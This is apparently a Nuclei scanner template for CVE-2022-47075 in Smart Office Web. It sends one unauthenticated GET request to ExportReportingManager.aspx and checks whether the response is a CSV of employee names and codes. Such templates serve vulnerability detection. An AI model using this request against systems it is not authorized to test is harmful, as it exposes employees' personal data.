id: CVE-2022-47075 info: name: Smart Office Web 20.28 - Information Disclosure author: r3Y3r53 severity: high description: | An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx. reference: - https://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html - https://nvd.nist.gov/vuln/detail/CVE-2022-47075 - http://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html - https://cvewalkthrough.com/smart-office-suite-unauthenticated-data-ex/ - https://youtu.be/D42upepxzwM classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-47075 epss-score: 0.00409 epss-percentile: 0.70955 cpe: cpe:2.3:a:smartofficepayroll:smartoffice:*:*:*:*:web:*:*:* metadata: verified: true max-request: 1 vendor: smartofficepayroll product: smartoffice tags: packetstorm,cve,cve2022,smart-office,info,exposure http: - method: GET path: - "{{BaseURL}}/ExportReportingManager.aspx" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/CSV")' - 'contains(body, "EmployeeName") && contains(body, "EmployeeCode")' condition: and # digest: 490a0046304402204b6b51bfbbe763e5b7a8e3da29b3195e2c3217961672a5fa72950f03c608685602202f83f168c77907e74a2e6d0712a016a2ca1f28ef072e3f78480bafd66eab8623:922c64590222798bb761d5b6d8e72950